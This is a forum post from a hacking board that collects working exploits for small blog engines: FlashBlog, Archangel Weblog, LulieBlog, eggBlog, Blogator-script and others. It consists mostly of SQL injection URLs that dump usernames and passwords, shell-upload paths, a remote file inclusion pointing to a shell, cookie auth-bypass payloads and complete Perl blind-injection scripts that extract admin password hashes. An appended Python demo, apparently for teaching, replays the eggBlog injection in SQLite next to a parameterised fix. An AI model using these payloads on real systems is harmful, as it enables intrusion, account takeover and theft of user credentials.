[ Review of vulnerabilities in blog engines (except WP) ]
09.06.2008, 05:21
Members of Antichat - Level 5 | Registered: 23.08.2007 | Posts: 417 | Reputation: 3908
The section is called "CMS engines and blogs", but I haven't seen a review of blogs other than WordPress, so let's fix that)))
FlashBlog beta0.31 Remote File Upload
Upload the shell here:
http://[site.com]/admin/Editor/imgupload.php
View it here:
http://[site.com]/tus_imagenes/shell.php
FlashBlog SQL Injection
Code:
http://[host]/[path]//php/leer_comentarios.php?articulo_id=-1/**/union/**/select/**/1,2,3,4,5,concat(email,0x203a3a20,NombreUsuario,0x203a3a20,Password),7,8,9,10,11,12,13,14,15,16,17/**/from/**/usuarios/*
Archangel Weblog 0.90.02 Admin Auth Bypass, Upload File, Blind SQL Injection
Perl code:
#!/usr/bin/perl -w
# Archangel Weblog <= 0.90.02 - Remote SQL Injection exploit
# Portal   : Archangel Weblog 0.90.02
# Download : http://www.archangelmgt.com/Archangel_Weblog_v090_02.zip
# exploit reports the crypted password
# [*] Founded & Exploited by : Stack-Terrorist [v40]
# [*] Greetz : Houssamix & Djekmani & Jadi & iuoisn & Str0ke & All muslims HaCkeRs :)
# Based on PerlSploit Class v.1 by dj-moad@hotmail.fr (http://www.v4-Team/v4.txt), GNU GPL
use strict;
use LWP::UserAgent;
use HTTP::Request;

print "\t\t############################################################\n\n";
print "\t\t# Archangel Weblog <= 0.90.02 - Remote SQL Inj Exploit #\n\n";
print "\t\t# by Stack-Terrorist [v40] #\n\n";
print "\t\t############################################################\n\n";

die "Example: perl $0 http://victim.com/path/\n" unless @ARGV;

# column and table names of the authors table in the Archangel schema
my $user = "author_login";     # username column
my $pass = "author_password";  # password column
my $tab  = "authors";          # table holding the blog authors

my $ua = LWP::UserAgent->new() or die "Could not initialize browser\n";
$ua->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

# post_id is put into the article query unescaped; the UNION pulls login and
# password of author_id=1 into a column that is displayed, wrapped in <user>
# markers (CHAR(60,117,115,101,114,62) = "<user>") so they can be found in the page
my $host = $ARGV[0] . "/index.php?post_id=-1'/**/union/**/select/**/12,concat(CHAR(60,117,115,101,114,62),".$user.",CHAR(60,117,115,101,114,62),".$pass."),32,4,5,6,3/**/from/**/".$tab."/**/where/**/author_id=1/*";
my $res    = $ua->request(HTTP::Request->new(GET => $host));
my $answer = $res->content;

if ($answer =~ /<user>(.*?)<user>/) {
    print "\nBrought to you by v4-team.com...\n";
    print "\n[+] Admin User : $1";
}

# the password is stored as a 32-character hex hash
if ($answer =~ /([0-9a-fA-F]{32})/) {
    print "\n[+] Admin Hash : $1\n\n";
    print "\t\t# Exploit has reported user and password hash #\n\n";
} else {
    print "\n[-] Exploit Failed...\n";
}
#-------------------Exploit exploited by Stack-Terrorist --------------------#
miniBloggie 1.0 Delete Post
PHP code:
// del.php: post_id comes straight from the URL and is interpolated, unquoted
// and unchecked, into the DELETE statement
if (isset($_GET['post_id'])) $post_id = $_GET['post_id'];
if (isset($_GET['confirm'])) $confirm = $_GET['confirm'];
[...]
elseif ($confirm=="yes") {
[...]
$sql = "DELETE FROM blogdata WHERE post_id=$post_id";
$query = mysql_query($sql) or die("Cannot query the database.<br>" . mysql_error());
Vulnerable URL:
http://site/del.php?post_id=[postid]&confirm=yes
Example:
http://127.0.0.1/del.php?post_id=1&confirm=yes
Smartblog SQL Injection
Code:
http://localhost/[script_path]/index.php?idt=-1 UNION SELECT 1,concat_ws(0x3a,pseudo,pass),3,4,5,6,7,8,9 FROM smb_user--
BlogMe PHP SQL Injection
Code:
http://localhost/[BlogMe_path]/comments.php?id=-1 UNION SELECT 1,2,3,4,5,6,aes_decrypt(aes_encrypt(user(),0x71),0x71)--
BlogWorx 1.0 SQL Injection
Code:
http://www.example.com/lab/blogworx1.0/view.asp?id=1+union+select+0,1,2,Password,UserName,5,6+from+Users
Blog PixelMotion SQL Injection
Code:
http://www.xxx.org/blog/index.php?categorie=-1+union+select+0,1,2,database(),4,5,6/*
Blog PixelMotion File Upload
Upload the shell here:
http://[Site]/[script]/admin/modif_config.php
Retrieve it here:
http://[Site]/[script]/templateZip/[shell]
Blog PixelMotion Database Backup
http://[Site]/[script]/admin/sauvBase.php
The members table is called blog_utilisateurs.
LulieBlog 1.2 Admin Auth Bypass, Upload File, Blind SQL Injection
Code:
# LulieBlog 1.2 Multiple Remote Vulnerabilities (Admin Auth Bypass, Upload File, Blind SQL Injection)
# Author: Cod3rZ
# Site: http://cod3rz.helloweb.eu
# Site: http://devilsnight.altervista.org
# Date: 06/05/2008 [dd/mm/yyyy]
# Admin Auth Bypass:
# Modify Articles: send a request to site/Admin/article_modif2.php with:
# titre=[titlearticle]&text=[text]&media=[media]&id=[idarticle]
# New Article: send a request to site/Admin/article_suppr.php with:
# titre=[titlearticle]&text=[text]&media=[media]
# Change Admin Username & Blog Title: send a request to site/Admin/util_modif.php with:
# pseudo=[newadminnick]&titre=[newblogtitle]
# Change Admin Email: send a request to site/Admin/mails_modif.php with:
# recevmail=1&emetteur=[email]&desti=[email]
# PS: All administration variables are vulnerable!
# Upload File (Simple Exploit):
<html>
<head><title>LulieBlog Uploader - http://cod3rz.helloweb.eu</title></head>
<body bgcolor='#000000' text='#FFFFFF'>
<form name='cod3rz' action='site/Admin/media_insert.php' method='post' enctype='multipart/form-data'>
<font size='1' face='Verdana'>
<center>
Title:<br>
<input type='text' name='titre'><br>
File:<br>
<input type='file' name='fichier'><br>
<input type='hidden' name='lieu' value='0'>
Type File:<br> <select name='typemedia'>
<option value='1'>Image</option>
<option value='2'>Flash</option>
<option value='3'>Archive</option>
<option value='4'>Vid</option>
<option value='6'>Présentation PowerPoint</option>
<option value='7'>Fichiers PDF</option>
</select><br>
<input type='submit' name ='upload' value='Upload'></font></center>
</form></body></html>
# End
# Blind SQL Injection Exploit:
#!/usr/bin/perl
# LulieBlog 1.2 Remote Blind SQL Injection Exploit
# Author : Cod3rZ
# Site : http://cod3rz.helloweb.eu
# Site : http://devilsnight.altervista.org
# Usage : perl lb.pl site
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
use Time::HiRes;

my $site = $ARGV[0] or usage();
my $ua   = LWP::UserAgent->new;
# the stored value is an MD5 hex digest: digits 0-9 and letters a-f
my @array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
my $hash  = '';

sub usage {
    print " Usage: perl lb.pl site \n";
    print " Ex.: perl lb.pl http://127.0.0.1/blog \n";
    exit;
}

# send one request and return how long the server took to answer
sub request {
    my $url   = $_[0];
    my $start = Time::HiRes::time();
    my $response = $ua->request(GET $url);
    $response->is_success() || print($response->status_line . "\n");
    return Time::HiRes::time() - $start;
}

sub refresh {
    my $current = $_[0];
    print " -------------------------------------------------\n";
    print " LulieBlog 1.2 Remote Blind Sql Injection Exploit \n";
    print " Powered by Cod3rZ \n";
    print " http://cod3rz.helloweb.eu \n";
    print " -------------------------------------------------\n";
    print " Please Wait.. \n";
    print " Hash : $current \n";
    print " -------------------------------------------------\n";
}

# guess the 32 hash characters one at a time: a correct guess makes
# benchmark() stall the query, so an answer slower than 4 s confirms it
for (my $i = 1; $i < 33; $i++) {
    for (my $j = 0; $j < 16; $j++) {
        my $var = $site."/visumedia.php?id=-1' OR (SELECT IF((ASCII(SUBSTRING(`valeur_parametre`,".$i.",1))=".$array[$j]."),benchmark(200000000,CHAR(0)),0) FROM lulieblog_parametres WHERE nom_parametre='pass')/*";
        my $time = request($var);
        refresh($hash);
        if ($time > 4) {
            $hash .= chr($array[$j]);
            refresh($hash);
            last;
        }
    }
    if ($i == 1 && !$hash) {
        print " Failed \n";
        print " -------------------------------------------------\n";
        die();
    }
    if ($i == 32) {
        print " Exploit Terminated \n";
        print " -------------------------------------------------\n ";
    }
}
# http://cod3rz.helloweb.eu
Battle Blog <= 1.25 SQL Injection
For MS SQL Server:
/comment.asp?entry=22+and+1=convert(int,(select+@@version))--
For MS Access:
/comment.asp?entry=IIF((select%20mid(last(Name),1,1)%20from%20(select%20top%2010%20Name%20from%20MSysObjects))='a',0,'done')%00
Blogator-script 0.95 Change User Password
Vulnerable code:
PHP code:
line 23: $id=$_GET['a'];
line 24: $email=$_GET['b'];
line 25: $mdp=$_GET['c'];
.....
// the email is matched with LIKE, so passing b=% matches any address
line 27: $sql_change_pass=mysql_query("UPDATE membre SET pass = '$mdp' WHERE id_membre = '$id' AND email LIKE '$email' LIMIT 1");
Code:
http://www.site.com/_blogadata/include/init_pass2.php?c=[newpass]&a=[user id]&b=%
Blogator-script 0.95 SQL Injection
Vulnerable code:
PHP code:
line 27: $id_art=$_GET['id_art'];
......
// id_art goes into the query unquoted, so a UNION can be appended to it
line 34: $sql_res=mysql_query("SELECT sond_rep, votes_H, votes_F FROM sondage_rep WHERE id_sond = $id_art ORDER BY ordre");
Code:
http://www.site.com/_blogadata/include/sond_result.php?id_art=-99999/**/union/**/select/**/concat(pseudo,0x3a,pass,char(58),email),2,3/**/from/**/membre/**/where/**/id_membre=1/*
Blogator-script 0.95 File Inclusion
http://localhost/[script]/_blogadata/include/struct_admin.php?incl_page=http://localhost/shell.txt?
http://localhost/[script]/_blogadata/include/struct_admin_blog.php?incl_page=http://localhost/shell.txt?
http://localhost/[script]/_blogadata/include/struct_main.php?incl_page=http://localhost/shell.txt?
eggBlog 4.0 SQL Injection
Code:
# Author: __GiReX__
# mySite: girex.altervista.org
# Date: 27/03/2008 - 1/04/2008 Added exploit for str0ke
# CMS: eggBlog 4.0
# Site: eggblog.net
# Bug: SQL Injection (cookie vars)
# Type: 1 - Admin/User Authentication Bypass
# Bug2: Blind SQL Injection (same vars-query)
# Type: Password retrieve exploit
# Var : $_COOKIE['email'], $_COOKIE['password']
# Need: magic_quotes_gpc = Off
# File: index.php
require_once "_lib/global.php";
...
eb_pre();
# File: /_lib/globals.php
require_once '_lib/user.php';
...
function eb_pre() {
...
if(isset($_COOKIE['email']) && isset($_COOKIE['password']) && !isset($_SESSION['user_id'])) eb_login($_COOKIE['email'],$_COOKIE['password'],1);
# Let us see function eb_login
# File: /_lib/user.php
function eb_login($email,$password,$key) {
...
if($key==0) $password=md5($password);
# Our $key is set to 1 so the password will not be encrypted
$sql="SELECT user_id FROM eb_users WHERE user_email=\"".$email."\" AND md5(user_password)=\"".$password."\"";
$query=mysql_query($sql);
# I have no words, 2 vars not sanitized into a SELECT query
PoC 1:
GET [PATH]/index.php HTTP/1.1
Host: [HOST]
...
Cookie: email=@" OR "1; password=@" OR "1
# With this you will be authenticated as the first record of table eb_users
PoC 2:
GET [PATH]/index.php HTTP/1.1
Host: [HOST]
...
Cookie: email=@" OR "1; password=@" OR "1" AND user_id="[VICTIM_USER_ID]
# For anybody you want
##############################################################################################################
# Start Blind SQL Injection / Password retrieve exploit #
# NOTE: Password is in plain-text so take a coffee... #
##############################################################################################################
#!/usr/bin/perl -w
# EggBlog v4.0 Blind SQL Injection
# Password Retrieve Exploit
# Coded by __GiReX__
use strict;
use LWP::UserAgent;
use HTTP::Request;

if(not defined $ARGV[0])
{
    print "usage: perl $0 [host] [path]\n";
    print "example: perl $0 localhost /eggblog/\n";
    exit;
}

$| = 1;
my $client = new LWP::UserAgent;
# printable ASCII, then 0: ASCII(SUBSTRING()) past the end of the password is 0,
# so matching it means the whole password has been read
my @cset = (32..126, 0);
my ($i, $j, $hash, $get, $rv) = (0, 1, undef, undef, 0);
my $host = ($ARGV[0] =~ /^http:\/\//) ? $ARGV[0] : 'http://' . $ARGV[0];
$host .= $ARGV[1] unless not defined $ARGV[1];

banner();
check_vuln($host) or die "[-] Site not vulnerable\n";

# $j is the position in user_password; the loop ends when the terminating 0
# (last element of @cset) is the character that matched
while($i != $#cset)
{
    for($i = 0; $i <= $#cset; $i++)
    {
        my $pre_time = time();
        $rv = check_char($host, $cset[$i], $j);
        my $post_time = time();
        info(chr($cset[$i]), $post_time - $pre_time, $hash);
        # only the right guess makes benchmark() stall the query
        if($post_time - $pre_time > 3 and $rv)
        {
            $hash .= chr($cset[$i]) if $cset[$i];
            last;
        }
    }
    # nothing matched at this position (benchmark too short or charset wrong):
    # give up instead of looping forever
    last if $i > $#cset;
    $j++;
}

print "\n" . ((defined $hash) ?
    "[+] Admin password: ${hash} \n" :
    "[-] Exploit mistake: please check benchmark and charset\n");
print "[+] Exploit terminated\n\n";

sub banner
{
    print "\n";
    print "[+] EggBlog v4.0 Blind SQL Injection\n";
    print "[+] Password Retrieve Exploit\n";
    print "[+] Coded by __GiReX__\n";
    print "\n";
}

sub check_vuln
{
    my ($target, $res) = @_;
    $get = HTTP::Request->new('GET', $target);
    # a broken query shows up as a PHP warning from mysql_query() in the page
    $get->header('Cookie' => 'email=-1" WHERE X#; password=aaaaaaa;');
    $res = $client->request($get);
    if($res->is_success)
    {
        return 1 if $res->content =~ /<b>Warning<\/b>:/;
    }
    return 0;
}

sub check_char
{
    my ($target, $char, $n, $res) = @_;
    # time-based test: the query stalls for several seconds only when the
    # byte at position $n of user_id=1's password equals $char
    $get->header(Cookie =>
        'email=-1"+AND+'.
        'CASE+WHEN'.
        '((SELECT(ASCII(SUBSTRING(user_password,'.$n.',1)))FROM+eb_users+WHERE+user_id=1)='.$char.')'.
        'THEN+benchmark(90000000,CHAR(0))+'.
        'END#; '.
        'password=dummy_psw');
    $res = $client->request($get);
    return $res->is_success;
}

sub info
{
    my ($char, $delay, $hash) = @_;
    print STDOUT "[+] Admin password: ${hash}".$char."\r" unless not defined $hash;
}
# milw0rm.com [2008-04-01]
P.S. I'll be adding vulnerabilities gradually....
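Added example for this page (not from the post, not eggBlog's own code, and not __GiReX__'s exploit): the eggBlog cookie injection above, its PoC 1 / PoC 2 login bypass and the blind password retrieval, replayed against an in-memory SQLite stand-in for eb_users, next to the parameterised query that closes the hole. Everything here is an assumption for the demo: the table and its two rows are constructed, SQLite's dialect replaces MySQL's (single-quoted strings, `--` instead of `#`, unicode()/substr() instead of ASCII()/SUBSTRING(), md5() dropped), the oracle is the visible login result rather than benchmark() timing, and the character value is found by binary search, which generalises the one-request-per-candidate scan in the exploits above.

```python
import sqlite3

# query counter so the demo can report how many "requests" the extraction took
STATS = {"queries": 0}


def make_db():
    """In-memory stand-in for eggBlog's eb_users table (constructed sample rows;
    plaintext passwords, as the advisory says)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE eb_users (user_id INTEGER, user_email TEXT, user_password TEXT)")
    con.executemany("INSERT INTO eb_users VALUES (?, ?, ?)", [
        (1, "admin@example.invalid", "s3cr3t!pw"),
        (2, "bob@example.invalid", "hunter2"),
    ])
    return con


def vulnerable_login(con, email, password):
    """eb_login() pattern: both cookie values are spliced into the SQL text.
    eggBlog uses double quotes and md5(user_password); SQLite string literals
    are single-quoted and it has no md5(), so only the quoting is adapted.
    Returns the first matching user_id, or None."""
    sql = ("SELECT user_id FROM eb_users WHERE user_email='" + email +
           "' AND user_password='" + password + "'")
    STATS["queries"] += 1
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def safe_login(con, email, password):
    """The fix: bound parameters, so the cookie values never reach the SQL parser."""
    row = con.execute(
        "SELECT user_id FROM eb_users WHERE user_email=? AND user_password=?",
        (email, password),
    ).fetchone()
    return row[0] if row else None


def oracle(con, condition):
    """Boolean oracle: the email value closes the string, ORs in the attacker's
    condition and comments out the password check ('--' plays the role of '#').
    A login that succeeds for an email that cannot exist means the condition held."""
    return vulnerable_login(con, "x' OR (" + condition + ")--", "dummy") is not None


def bisect_int(con, expr, lo, hi):
    """Recover the integer value of an SQL expression in [lo, hi] with
    'expr > mid' questions: about log2(hi - lo + 1) queries per value."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(con, "(" + expr + ") > " + str(mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_password(con, user_id=1):
    """Pull user_password of the given user_id one character at a time;
    MySQL's ASCII()/SUBSTRING() become SQLite's unicode()/substr()."""
    sub = "(SELECT user_password FROM eb_users WHERE user_id=%d)" % user_id
    length = bisect_int(con, "length(" + sub + ")", 0, 64)   # assumes <= 64 chars
    chars = []
    for pos in range(1, length + 1):
        chars.append(chr(bisect_int(con, "unicode(substr(%s, %d, 1))" % (sub, pos), 0, 127)))
    return "".join(chars)


def demo():
    con = make_db()
    bypass = "@' OR '1"          # PoC 1 from the advisory, single-quoted for SQLite
    results = {
        # PoC 1: authenticated as the first row of eb_users
        "bypass_vulnerable": vulnerable_login(con, bypass, bypass),
        # PoC 2: choose the victim row explicitly
        "bypass_targeted": vulnerable_login(con, bypass, "@' OR '1' AND user_id='2"),
        # the same payloads against the parameterised query
        "bypass_safe": safe_login(con, bypass, bypass),
    }
    STATS["queries"] = 0
    results["extracted"] = extract_password(con)
    results["queries"] = STATS["queries"]
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print("%-18s %r" % (key, value))
```

The bypass payloads succeed against vulnerable_login() and return None from safe_login() with identical input, and the nine-character password comes back in under 70 oracle queries (7 per character) where the linear scan in the exploits above needs up to 96 per character. With a time-based oracle such as benchmark() the only change is the oracle() function: replace "did the login succeed" with "did the response take longer than the threshold".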